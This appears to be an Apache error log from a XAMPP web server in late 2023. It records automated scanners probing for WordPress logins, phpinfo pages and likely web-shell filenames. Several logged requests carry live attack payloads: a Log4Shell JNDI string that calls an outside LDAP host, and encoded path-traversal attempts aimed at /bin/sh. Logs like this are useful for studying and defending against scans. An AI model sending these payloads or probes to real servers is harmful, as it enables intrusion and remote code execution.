[Fri Sep 29 01:24:47.571788 2023] [php:error] [pid 21316:tid 4860] [client 134.209.155.21:56000] script 'C:/xampp/htdocs/default/wp-pano.php' not found or unable to stat
[Fri Sep 29 02:01:58.970353 2023] [cgi:error] [pid 21316:tid 4940] [client 35.176.8.170:40274] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/login.cgi
[Fri Sep 29 02:06:10.979869 2023] [cgi:error] [pid 21316:tid 4940] [client 35.176.8.170:39452] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/index.asp
[Fri Sep 29 11:03:19.646521 2023] [php:error] [pid 21316:tid 4916] [client 222.73.129.15:50319] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Sep 29 16:07:54.859915 2023] [php:error] [pid 21316:tid 4940] [client 159.65.140.22:39450] script 'C:/xampp/htdocs/default/upl.php' not found or unable to stat
[Fri Sep 29 16:07:56.684181 2023] [php:error] [pid 21316:tid 4852] [client 159.65.140.22:43488] script 'C:/xampp/htdocs/default/1.php' not found or unable to stat
[Fri Sep 29 16:07:58.159936 2023] [php:error] [pid 21316:tid 4852] [client 159.65.140.22:43516] script 'C:/xampp/htdocs/default/password.php' not found or unable to stat
[Fri Sep 29 16:07:58.554369 2023] [php:error] [pid 21316:tid 4852] [client 159.65.140.22:43532] script 'C:/xampp/htdocs/default/info.php' not found or unable to stat
[Fri Sep 29 20:28:05.252683 2023] [php:error] [pid 21316:tid 4796] [client 36.85.39.34:8990] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Fri Sep 29 20:28:05.414244 2023] [php:error] [pid 21316:tid 4876] [client 164.163.32.190:15021] script 'C:/xampp/htdocs/default/register.php' not found or unable to stat
[Fri Sep 29 20:28:05.900483 2023] [php:error] [pid 21316:tid 4840] [client 115.76.54.106:7702] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Fri Sep 29 23:27:16.656855 2023] [php:error] [pid 21316:tid 4916] [client 107.189.5.43:63186] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://www.google.com.hk
[Sat Sep 30 02:13:35.345319 2023] [php:error] [pid 21316:tid 4916] [client 143.244.128.216:51380] script 'C:/xampp/htdocs/default/upl.php' not found or unable to stat
[Sat Sep 30 02:13:36.965133 2023] [php:error] [pid 21316:tid 4916] [client 143.244.128.216:51430] script 'C:/xampp/htdocs/default/1.php' not found or unable to stat
[Sat Sep 30 02:13:38.242642 2023] [php:error] [pid 21316:tid 4916] [client 143.244.128.216:51464] script 'C:/xampp/htdocs/default/password.php' not found or unable to stat
[Sat Sep 30 02:13:38.570729 2023] [php:error] [pid 21316:tid 4916] [client 143.244.128.216:51468] script 'C:/xampp/htdocs/default/info.php' not found or unable to stat
[Sat Sep 30 04:43:40.662483 2023] [php:error] [pid 21316:tid 4916] [client 45.95.147.236:44458] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat
[Sat Sep 30 04:43:40.779390 2023] [php:error] [pid 21316:tid 4916] [client 45.95.147.236:44458] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat
[Sat Sep 30 04:43:41.961132 2023] [php:error] [pid 21316:tid 4916] [client 45.95.147.236:44458] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat
[Sat Sep 30 05:38:04.439144 2023] [php:error] [pid 21316:tid 4916] [client 132.145.39.16:32860] script 'C:/xampp/htdocs/default/phpinfo.php' not found or unable to stat
[Sat Sep 30 05:38:04.512200 2023] [php:error] [pid 21316:tid 4916] [client 132.145.39.16:32880] script 'C:/xampp/htdocs/default/info.php' not found or unable to stat
[Sat Sep 30 05:38:04.584204 2023] [php:error] [pid 21316:tid 4916] [client 132.145.39.16:32910] script 'C:/xampp/htdocs/default/php.php' not found or unable to stat
[Sat Sep 30 05:38:04.656143 2023] [php:error] [pid 21316:tid 4916] [client 132.145.39.16:32930] script 'C:/xampp/htdocs/default/test.php' not found or unable to stat
[Sun Oct 01 03:27:27.957339 2023] [php:error] [pid 21316:tid 4916] [client 43.134.71.15:53738] script 'C:/xampp/htdocs/default/nation.php' not found or unable to stat
[Sun Oct 01 03:27:29.513723 2023] [php:error] [pid 21316:tid 4932] [client 43.134.71.15:57206] script 'C:/xampp/htdocs/default/news.php' not found or unable to stat
[Sun Oct 01 07:04:16.495170 2023] [php:error] [pid 21316:tid 4824] [client 50.63.3.108:31372] script 'C:/xampp/htdocs/default/atomlib.php' not found or unable to stat
[Sun Oct 01 07:04:16.495170 2023] [php:error] [pid 21316:tid 4872] [client 50.63.3.108:31376] script 'C:/xampp/htdocs/default/ninja.php' not found or unable to stat
[Sun Oct 01 07:04:16.495170 2023] [php:error] [pid 21316:tid 4944] [client 50.63.3.108:31380] script 'C:/xampp/htdocs/default/simple.php' not found or unable to stat
[Sun Oct 01 07:04:16.495170 2023] [php:error] [pid 21316:tid 4896] [client 50.63.3.108:31378] script 'C:/xampp/htdocs/default/shell.php' not found or unable to stat
[Sun Oct 01 07:04:16.496169 2023] [php:error] [pid 21316:tid 4852] [client 50.63.3.108:31382] script 'C:/xampp/htdocs/default/nf_tracking.php' not found or unable to stat
[Sun Oct 01 07:04:16.496169 2023] [php:error] [pid 21316:tid 4932] [client 50.63.3.108:31374] script 'C:/xampp/htdocs/default/wp-atom.php' not found or unable to stat
[Sun Oct 01 07:09:30.010795 2023] [php:error] [pid 21316:tid 4852] [client 50.63.3.108:46876] script 'C:/xampp/htdocs/default/wp-atom.php' not found or unable to stat
[Sun Oct 01 07:09:30.011796 2023] [php:error] [pid 21316:tid 4932] [client 50.63.3.108:46878] script 'C:/xampp/htdocs/default/atomlib.php' not found or unable to stat
[Sun Oct 01 07:09:30.171638 2023] [php:error] [pid 21316:tid 4852] [client 50.63.3.108:46876] script 'C:/xampp/htdocs/default/ninja.php' not found or unable to stat
[Sun Oct 01 07:09:30.173639 2023] [php:error] [pid 21316:tid 4932] [client 50.63.3.108:46878] script 'C:/xampp/htdocs/default/shell.php' not found or unable to stat
[Sun Oct 01 07:09:30.332269 2023] [php:error] [pid 21316:tid 4852] [client 50.63.3.108:46876] script 'C:/xampp/htdocs/default/simple.php' not found or unable to stat
[Sun Oct 01 07:09:30.334269 2023] [php:error] [pid 21316:tid 4932] [client 50.63.3.108:46878] script 'C:/xampp/htdocs/default/nf_tracking.php' not found or unable to stat
[Sun Oct 01 07:21:07.120993 2023] [php:error] [pid 21316:tid 4872] [client 50.63.3.108:48886] script 'C:/xampp/htdocs/default/ninja.php' not found or unable to stat
[Sun Oct 01 07:21:07.120993 2023] [php:error] [pid 21316:tid 4852] [client 50.63.3.108:48884] script 'C:/xampp/htdocs/default/wp-atom.php' not found or unable to stat
[Sun Oct 01 07:21:07.120993 2023] [php:error] [pid 21316:tid 4932] [client 50.63.3.108:48882] script 'C:/xampp/htdocs/default/atomlib.php' not found or unable to stat
[Sun Oct 01 07:21:07.120993 2023] [php:error] [pid 21316:tid 4824] [client 50.63.3.108:48888] script 'C:/xampp/htdocs/default/shell.php' not found or unable to stat
[Sun Oct 01 07:21:07.121994 2023] [php:error] [pid 21316:tid 4944] [client 50.63.3.108:48890] script 'C:/xampp/htdocs/default/simple.php' not found or unable to stat
[Sun Oct 01 07:21:07.121994 2023] [php:error] [pid 21316:tid 4896] [client 50.63.3.108:48892] script 'C:/xampp/htdocs/default/nf_tracking.php' not found or unable to stat
[Sun Oct 01 07:27:01.011210 2023] [php:error] [pid 21316:tid 4932] [client 153.122.55.229:46617] script 'C:/xampp/htdocs/default/nf_tracking.php' not found or unable to stat
[Sun Oct 01 07:27:01.011210 2023] [php:error] [pid 21316:tid 4852] [client 153.122.55.229:46615] script 'C:/xampp/htdocs/default/shell.php' not found or unable to stat
[Sun Oct 01 07:27:01.011210 2023] [php:error] [pid 21316:tid 4876] [client 153.122.55.229:46612] script 'C:/xampp/htdocs/default/atomlib.php' not found or unable to stat
[Sun Oct 01 07:27:01.012213 2023] [php:error] [pid 21316:tid 4896] [client 153.122.55.229:46613] script 'C:/xampp/htdocs/default/wp-atom.php' not found or unable to stat
[Sun Oct 01 07:27:01.012213 2023] [php:error] [pid 21316:tid 4944] [client 153.122.55.229:46616] script 'C:/xampp/htdocs/default/simple.php' not found or unable to stat
[Sun Oct 01 07:27:01.012213 2023] [php:error] [pid 21316:tid 4872] [client 153.122.55.229:46614] script 'C:/xampp/htdocs/default/ninja.php' not found or unable to stat
[Sun Oct 01 07:32:48.507103 2023] [php:error] [pid 21316:tid 4852] [client 50.63.3.108:41773] script 'C:/xampp/htdocs/default/shell.php' not found or unable to stat
[Sun Oct 01 07:32:48.507103 2023] [php:error] [pid 21316:tid 4872] [client 50.63.3.108:41769] script 'C:/xampp/htdocs/default/wp-atom.php' not found or unable to stat
[Sun Oct 01 07:32:48.507103 2023] [php:error] [pid 21316:tid 4876] [client 50.63.3.108:41767] script 'C:/xampp/htdocs/default/atomlib.php' not found or unable to stat
[Sun Oct 01 07:32:48.507103 2023] [php:error] [pid 21316:tid 4944] [client 50.63.3.108:41771] script 'C:/xampp/htdocs/default/ninja.php' not found or unable to stat
[Sun Oct 01 07:32:48.507103 2023] [php:error] [pid 21316:tid 4932] [client 50.63.3.108:41775] script 'C:/xampp/htdocs/default/simple.php' not found or unable to stat
[Sun Oct 01 07:32:48.665761 2023] [php:error] [pid 21316:tid 4876] [client 50.63.3.108:41767] script 'C:/xampp/htdocs/default/nf_tracking.php' not found or unable to stat
[Sun Oct 01 07:46:06.580465 2023] [php:error] [pid 21316:tid 4908] [client 50.63.3.108:28940] script 'C:/xampp/htdocs/default/ninja.php' not found or unable to stat
[Sun Oct 01 07:46:06.581442 2023] [php:error] [pid 21316:tid 4824] [client 50.63.3.108:28942] script 'C:/xampp/htdocs/default/shell.php' not found or unable to stat
[Sun Oct 01 07:46:06.581442 2023] [php:error] [pid 21316:tid 4924] [client 50.63.3.108:28938] script 'C:/xampp/htdocs/default/wp-atom.php' not found or unable to stat
[Sun Oct 01 07:46:06.581442 2023] [php:error] [pid 21316:tid 4780] [client 50.63.3.108:28944] script 'C:/xampp/htdocs/default/simple.php' not found or unable to stat
[Sun Oct 01 07:46:06.581442 2023] [php:error] [pid 21316:tid 4796] [client 50.63.3.108:28946] script 'C:/xampp/htdocs/default/nf_tracking.php' not found or unable to stat
[Sun Oct 01 07:46:06.581442 2023] [php:error] [pid 21316:tid 4852] [client 50.63.3.108:28948] script 'C:/xampp/htdocs/default/atomlib.php' not found or unable to stat
[Sun Oct 01 07:51:20.370860 2023] [php:error] [pid 21316:tid 4780] [client 50.63.3.108:19776] script 'C:/xampp/htdocs/default/ninja.php' not found or unable to stat
[Sun Oct 01 07:51:20.370860 2023] [php:error] [pid 21316:tid 4796] [client 50.63.3.108:19780] script 'C:/xampp/htdocs/default/simple.php' not found or unable to stat
[Sun Oct 01 07:51:20.370860 2023] [php:error] [pid 21316:tid 4908] [client 50.63.3.108:19778] script 'C:/xampp/htdocs/default/shell.php' not found or unable to stat
[Sun Oct 01 07:51:20.371859 2023] [php:error] [pid 21316:tid 4924] [client 50.63.3.108:19782] script 'C:/xampp/htdocs/default/nf_tracking.php' not found or unable to stat
[Sun Oct 01 07:51:20.371859 2023] [php:error] [pid 21316:tid 4852] [client 50.63.3.108:19786] script 'C:/xampp/htdocs/default/wp-atom.php' not found or unable to stat
[Sun Oct 01 07:51:20.371859 2023] [php:error] [pid 21316:tid 4824] [client 50.63.3.108:19784] script 'C:/xampp/htdocs/default/atomlib.php' not found or unable to stat
[Sun Oct 01 13:27:19.272649 2023] [php:error] [pid 21316:tid 4908] [client 194.113.235.169:38921] script 'C:/xampp/htdocs/default/wp-upload.php' not found or unable to stat, referer: http://fphosting.eu/wp-upload.php
[Sun Oct 01 13:27:19.329489 2023] [php:error] [pid 21316:tid 4780] [client 194.113.235.169:58791] script 'C:/xampp/htdocs/default/wp-log.php' not found or unable to stat, referer: http://fphosting.eu/wp-log.php
[Sun Oct 01 14:52:16.452311 2023] [php:error] [pid 21316:tid 4852] [client 5.188.210.227:60831] script 'C:/xampp/htdocs/default/echo.php' not found or unable to stat, referer: https://www.google.com/
[Sun Oct 01 22:22:21.194135 2023] [php:error] [pid 21316:tid 4772] [client 66.249.66.2:62831] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Mon Oct 02 02:04:00.069387 2023] [php:error] [pid 21316:tid 4772] [client 137.115.0.18:54340] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Mon Oct 02 02:04:00.532098 2023] [php:error] [pid 21316:tid 4796] [client 1.4.217.108:58081] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Mon Oct 02 02:04:01.091713 2023] [php:error] [pid 21316:tid 4916] [client 117.0.79.201:51466] script 'C:/xampp/htdocs/default/register.php' not found or unable to stat
[Mon Oct 02 07:08:36.889898 2023] [php:error] [pid 21316:tid 4772] [client 68.178.223.183:36888] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 02 07:11:28.592149 2023] [php:error] [pid 21316:tid 4772] [client 68.178.223.183:25147] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 02 07:11:52.703121 2023] [php:error] [pid 21316:tid 4772] [client 217.21.94.76:61632] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 02 07:13:04.935575 2023] [php:error] [pid 21316:tid 4772] [client 88.87.70.158:49862] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 02 07:16:52.746477 2023] [php:error] [pid 21316:tid 4772] [client 62.210.185.4:54240] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 02 07:17:29.692369 2023] [php:error] [pid 21316:tid 4772] [client 108.166.217.200:60182] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 02 07:17:34.476828 2023] [php:error] [pid 21316:tid 4908] [client 173.201.189.60:43286] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 02 07:17:42.223880 2023] [php:error] [pid 21316:tid 4908] [client 173.201.189.60:44292] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 02 07:17:58.762568 2023] [php:error] [pid 21316:tid 4908] [client 3.121.175.204:33778] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 02 07:19:11.917494 2023] [php:error] [pid 21316:tid 4908] [client 145.14.156.68:56582] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 02 07:22:59.294415 2023] [php:error] [pid 21316:tid 4772] [client 145.14.152.156:55996] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 02 07:23:07.716185 2023] [php:error] [pid 21316:tid 4772] [client 185.184.155.54:55056] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 02 07:24:01.925898 2023] [php:error] [pid 21316:tid 4908] [client 62.210.185.4:35586] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 02 14:13:28.676318 2023] [php:error] [pid 21316:tid 4908] [client 153.122.55.229:34239] script 'C:/xampp/htdocs/default/shell.php' not found or unable to stat
[Mon Oct 02 14:13:28.676318 2023] [php:error] [pid 21316:tid 4784] [client 153.122.55.229:34236] script 'C:/xampp/htdocs/default/atomlib.php' not found or unable to stat
[Mon Oct 02 14:13:28.676318 2023] [php:error] [pid 21316:tid 4872] [client 153.122.55.229:34238] script 'C:/xampp/htdocs/default/ninja.php' not found or unable to stat
[Mon Oct 02 14:13:28.676318 2023] [php:error] [pid 21316:tid 4840] [client 153.122.55.229:34237] script 'C:/xampp/htdocs/default/wp-atom.php' not found or unable to stat
[Mon Oct 02 14:13:31.083287 2023] [php:error] [pid 21316:tid 4796] [client 153.122.55.229:34627] script 'C:/xampp/htdocs/default/simple.php' not found or unable to stat
[Mon Oct 02 14:13:31.083287 2023] [php:error] [pid 21316:tid 4860] [client 153.122.55.229:34628] script 'C:/xampp/htdocs/default/nf_tracking.php' not found or unable to stat
[Mon Oct 02 15:22:09.261142 2023] [php:error] [pid 21316:tid 4924] [client 27.111.82.74:34980] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Oct 02 21:14:09.050535 2023] [php:error] [pid 21316:tid 4780] [client 119.45.128.120:60362] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Oct 02 21:33:45.769179 2023] [php:error] [pid 21316:tid 4860] [client 137.116.141.77:46110] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Oct 02 22:07:39.936286 2023] [php:error] [pid 21316:tid 4812] [client 213.190.6.41:25428] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Oct 02 22:07:57.590502 2023] [php:error] [pid 21316:tid 4768] [client 3.121.175.204:57336] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Tue Oct 03 00:01:01.130652 2023] [php:error] [pid 21316:tid 4944] [client 45.89.246.214:33970] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Oct 03 00:06:21.296639 2023] [php:error] [pid 21316:tid 4932] [client 62.28.184.124:40125] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Oct 03 00:18:12.976238 2023] [php:error] [pid 21316:tid 4784] [client 47.128.41.98:36392] script 'C:/xampp/htdocs/default/zm.php' not found or unable to stat
[Tue Oct 03 00:21:37.380019 2023] [php:error] [pid 21316:tid 4812] [client 5.189.130.31:36642] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Oct 03 01:11:12.579214 2023] [php:error] [pid 21316:tid 4944] [client 45.89.246.214:42762] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Oct 03 04:28:28.192446 2023] [php:error] [pid 21316:tid 4760] [client 194.113.235.169:45602] script 'C:/xampp/htdocs/default/new.php' not found or unable to stat, referer: http://fphosting.eu/new.php
[Tue Oct 03 04:28:28.202448 2023] [php:error] [pid 21316:tid 4904] [client 194.113.235.169:41456] script 'C:/xampp/htdocs/default/news.php' not found or unable to stat, referer: http://fphosting.eu/news.php
[Tue Oct 03 19:24:10.402006 2023] [php:error] [pid 21316:tid 4840] [client 178.239.198.70:1471] script 'C:/xampp/htdocs/default/frontend_dev.php' not found or unable to stat
[Tue Oct 03 19:25:08.705831 2023] [php:error] [pid 21316:tid 4840] [client 178.239.198.38:6859] script 'C:/xampp/htdocs/default/app_dev.php' not found or unable to stat
[Tue Oct 03 19:25:27.438060 2023] [php:error] [pid 21316:tid 4768] [client 178.239.198.66:28933] script 'C:/xampp/htdocs/default/app_dev.php' not found or unable to stat
[Tue Oct 03 19:25:29.319673 2023] [php:error] [pid 21316:tid 4768] [client 178.239.198.38:3457] script 'C:/xampp/htdocs/default/phpinfo.php' not found or unable to stat
[Tue Oct 03 19:25:30.089606 2023] [php:error] [pid 21316:tid 4768] [client 178.239.198.52:49527] script 'C:/xampp/htdocs/default/info.php' not found or unable to stat
[Tue Oct 03 19:25:37.121296 2023] [php:error] [pid 21316:tid 4840] [client 178.239.198.60:3311] script 'C:/xampp/htdocs/default/__info.php' not found or unable to stat
[Tue Oct 03 19:25:37.693972 2023] [php:error] [pid 21316:tid 4840] [client 178.239.198.50:34235] script 'C:/xampp/htdocs/default/_info-backoffice.php' not found or unable to stat
[Tue Oct 03 19:25:37.909172 2023] [php:error] [pid 21316:tid 4840] [client 178.239.198.66:19067] script 'C:/xampp/htdocs/default/_info.php' not found or unable to stat
[Tue Oct 03 19:25:38.244902 2023] [php:error] [pid 21316:tid 4840] [client 178.239.198.68:8077] script 'C:/xampp/htdocs/default/_phpinf.php' not found or unable to stat
[Tue Oct 03 19:25:38.821176 2023] [php:error] [pid 21316:tid 4840] [client 178.239.198.43:64783] script 'C:/xampp/htdocs/default/_phpinfo.php' not found or unable to stat
[Tue Oct 03 19:25:39.480888 2023] [php:error] [pid 21316:tid 4840] [client 178.239.198.64:24271] script 'C:/xampp/htdocs/default/_poopinfo.php' not found or unable to stat
[Tue Oct 03 19:25:40.469081 2023] [php:error] [pid 21316:tid 4840] [client 178.239.198.56:5307] script 'C:/xampp/htdocs/default/.__info.php' not found or unable to stat
[Tue Oct 03 19:25:40.978366 2023] [php:error] [pid 21316:tid 4840] [client 178.239.198.46:13061] script 'C:/xampp/htdocs/default/.info.php' not found or unable to stat
[Tue Oct 03 19:25:41.648608 2023] [php:error] [pid 21316:tid 4840] [client 178.239.198.52:42433] script 'C:/xampp/htdocs/default/0.0_phpinfo.php' not found or unable to stat
[Tue Oct 03 19:25:42.186298 2023] [php:error] [pid 21316:tid 4840] [client 178.239.198.62:13251] script 'C:/xampp/htdocs/default/00_server_info.php' not found or unable to stat
[Tue Oct 03 19:25:42.556434 2023] [php:error] [pid 21316:tid 4840] [client 178.239.198.59:24999] script 'C:/xampp/htdocs/default/02-info.php' not found or unable to stat
[Tue Oct 03 19:25:42.908525 2023] [php:error] [pid 21316:tid 4840] [client 178.239.198.71:24619] script 'C:/xampp/htdocs/default/1_1_PhpInfo.php' not found or unable to stat
[Tue Oct 03 19:25:43.469009 2023] [php:error] [pid 21316:tid 4840] [client 178.239.198.52:53195] script 'C:/xampp/htdocs/default/5info.php' not found or unable to stat
[Tue Oct 03 21:48:33.480471 2023] [php:error] [pid 21316:tid 4916] [client 39.109.127.157:54071] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Oct 03 22:18:23.221902 2023] [core:error] [pid 21316:tid 4916] (20024)The given path is misformatted or contained invalid characters: [client 61.178.32.114:25945] AH00127: Cannot map GET /${jndi:ldap://93.95.216.134:1389/Exploit} HTTP/1.1 to file
[Wed Oct 04 00:45:11.547526 2023] [core:error] [pid 21316:tid 4916] (20024)The given path is misformatted or contained invalid characters: [client 148.153.84.125:59633] AH00127: Cannot map GET /${jndi:ldap://93.95.216.134:1389/Exploit} HTTP/1.1 to file
[Wed Oct 04 03:11:42.281066 2023] [php:error] [pid 21316:tid 4944] [client 138.68.63.223:42686] script 'C:/xampp/htdocs/default/upl.php' not found or unable to stat
[Wed Oct 04 03:11:44.071330 2023] [php:error] [pid 21316:tid 4944] [client 138.68.63.223:42734] script 'C:/xampp/htdocs/default/1.php' not found or unable to stat
[Wed Oct 04 03:11:45.502396 2023] [php:error] [pid 21316:tid 4904] [client 138.68.63.223:50792] script 'C:/xampp/htdocs/default/password.php' not found or unable to stat
[Wed Oct 04 03:11:45.859262 2023] [php:error] [pid 21316:tid 4904] [client 138.68.63.223:50808] script 'C:/xampp/htdocs/default/info.php' not found or unable to stat
[Wed Oct 04 04:12:07.101254 2023] [core:error] [pid 21316:tid 4932] (20024)The given path is misformatted or contained invalid characters: [client 47.111.117.48:55142] AH00127: Cannot map GET /${jndi:ldap://93.95.216.134:1389/Exploit} HTTP/1.1 to file
[Wed Oct 04 08:11:03.902979 2023] [core:error] [pid 21316:tid 4792] (20024)The given path is misformatted or contained invalid characters: [client 182.253.117.130:35042] AH00127: Cannot map GET /${jndi:ldap://93.95.216.134:1389/Exploit} HTTP/1.1 to file
[Wed Oct 04 10:06:48.894295 2023] [php:error] [pid 21316:tid 4804] [client 154.181.211.101:7989] script 'C:/xampp/htdocs/default/register.php' not found or unable to stat
[Wed Oct 04 10:06:49.200708 2023] [php:error] [pid 21316:tid 4944] [client 110.137.36.64:8916] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Wed Oct 04 10:06:49.594633 2023] [php:error] [pid 21316:tid 4832] [client 103.141.254.18:52541] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Wed Oct 04 10:06:50.463382 2023] [php:error] [pid 21316:tid 4804] [client 14.234.3.64:57464] script 'C:/xampp/htdocs/default/register.php' not found or unable to stat
[Wed Oct 04 10:12:25.118756 2023] [core:error] [pid 21316:tid 4832] (20024)The given path is misformatted or contained invalid characters: [client 5.157.38.50:39090] AH00127: Cannot map GET /${jndi:ldap://93.95.216.134:1389/Exploit} HTTP/1.1 to file
[Wed Oct 04 15:04:55.220152 2023] [authz_core:error] [pid 21316:tid 4756] [client 185.130.224.69:34278] AH01630: client denied by server configuration: C:/xampp/htdocs/default/server-status
[Wed Oct 04 17:36:23.660720 2023] [authz_core:error] [pid 21316:tid 4804] [client 35.216.133.80:48400] AH01630: client denied by server configuration: C:/xampp/htdocs/default/server-status
[Wed Oct 04 17:36:23.876808 2023] [php:error] [pid 21316:tid 4804] [client 35.216.133.80:48436] script 'C:/xampp/htdocs/default/info.php' not found or unable to stat
[Wed Oct 04 20:05:28.820062 2023] [php:error] [pid 21316:tid 4840] [client 63.135.161.184:38285] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Wed Oct 04 20:59:37.143386 2023] [authz_core:error] [pid 21316:tid 4756] [client 165.154.182.53:35084] AH01630: client denied by server configuration: C:/xampp/phpMyAdmin/index.php
[Wed Oct 04 20:59:38.157836 2023] [php:error] [pid 21316:tid 4896] [client 165.154.182.53:35520] script 'C:/xampp/htdocs/default/index_sso.php' not found or unable to stat
[Wed Oct 04 22:17:19.905905 2023] [core:error] [pid 21316:tid 4896] (20024)The given path is misformatted or contained invalid characters: [client 112.213.110.59:44150] AH00127: Cannot map GET /${jndi:ldap://93.95.216.134:1389/Exploit} HTTP/1.1 to file
[Wed Oct 04 22:42:34.207147 2023] [php:error] [pid 21316:tid 4756] [client 45.242.106.231:51378] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Wed Oct 04 22:42:35.316604 2023] [php:error] [pid 21316:tid 4756] [client 171.240.144.9:52591] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat
[Thu Oct 05 02:34:46.384028 2023] [core:error] [pid 21316:tid 4840] [client 165.154.210.7:36804] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Thu Oct 05 10:47:37.283800 2023] [php:error] [pid 21316:tid 4896] [client 203.56.198.108:57474] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Thu Oct 05 17:03:16.419694 2023] [php:error] [pid 21316:tid 4784] [client 18.177.152.10:41408] script 'C:/xampp/htdocs/default/wp-config.php' not found or unable to stat
[Thu Oct 05 17:33:49.170001 2023] [php:error] [pid 21316:tid 4784] [client 3.229.122.110:60335] script 'C:/xampp/htdocs/default/wp-config.php' not found or unable to stat
[Thu Oct 05 17:37:13.096221 2023] [php:error] [pid 21316:tid 4860] [client 3.36.15.230:59738] script 'C:/xampp/htdocs/default/wp-config.php' not found or unable to stat
[Thu Oct 05 17:39:44.973906 2023] [authz_core:error] [pid 21316:tid 4840] [client 109.74.204.123:44178] AH01630: client denied by server configuration: C:/xampp/htdocs/default/server-status
[Fri Oct 06 02:02:53.350858 2023] [cgi:error] [pid 21316:tid 4904] [client 185.180.143.18:47116] AH02811: script not found or unable to stat: C:/xampp/cgi-bin/authLogin.cgi
[Fri Oct 06 02:04:50.423323 2023] [core:error] [pid 21316:tid 4792] [client 185.180.143.18:51158] AH10244: invalid URI path (/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png)
[Fri Oct 06 02:04:50.680738 2023] [core:error] [pid 21316:tid 4792] [client 185.180.143.18:51166] AH10244: invalid URI path (/icons/.%2e/%2e%2e/apache2/icons/sphere1.png)
[Fri Oct 06 02:04:50.938613 2023] [core:error] [pid 21316:tid 4792] [client 185.180.143.18:51168] AH10244: invalid URI path (/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png)
[Fri Oct 06 11:02:28.903135 2023] [php:error] [pid 21316:tid 4916] [client 92.205.59.75:60620] script 'C:/xampp/htdocs/default/wp.php' not found or unable to stat
[Fri Oct 06 11:09:32.281158 2023] [php:error] [pid 21316:tid 4916] [client 198.46.134.156:50878] script 'C:/xampp/htdocs/default/wp.php' not found or unable to stat
[Fri Oct 06 11:14:18.415075 2023] [php:error] [pid 21316:tid 4932] [client 198.46.134.156:41578] script 'C:/xampp/htdocs/default/wp.php' not found or unable to stat
[Fri Oct 06 11:17:08.570440 2023] [php:error] [pid 21316:tid 4804] [client 50.62.145.77:56921] script 'C:/xampp/htdocs/default/wp.php' not found or unable to stat
[Fri Oct 06 14:25:57.972192 2023] [php:error] [pid 21316:tid 4904] [client 217.165.39.234:44798] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Fri Oct 06 14:25:58.374246 2023] [php:error] [pid 21316:tid 4916] [client 43.224.2.133:34745] script 'C:/xampp/htdocs/default/register.php' not found or unable to stat
[Fri Oct 06 15:26:06.307579 2023] [php:error] [pid 21316:tid 4932] [client 173.239.211.88:53019] script 'C:/xampp/htdocs/default/login.php' not found or unable to stat
[Fri Oct 06 16:30:11.713200 2023] [php:error] [pid 21316:tid 4768] [client 189.126.206.157:35146] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Oct 06 22:59:33.618537 2023] [php:error] [pid 21316:tid 4840] [client 37.9.13.54:39800] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Oct 06 23:00:21.972522 2023] [php:error] [pid 21316:tid 4784] [client 185.94.230.98:41250] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Oct 06 23:01:11.399831 2023] [php:error] [pid 21316:tid 4784] [client 160.153.254.38:40822] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Oct 06 23:02:59.190345 2023] [php:error] [pid 21316:tid 4784] [client 37.9.13.54:39416] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Oct 06 23:03:54.356981 2023] [php:error] [pid 21316:tid 4848] [client 88.99.65.95:52154] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
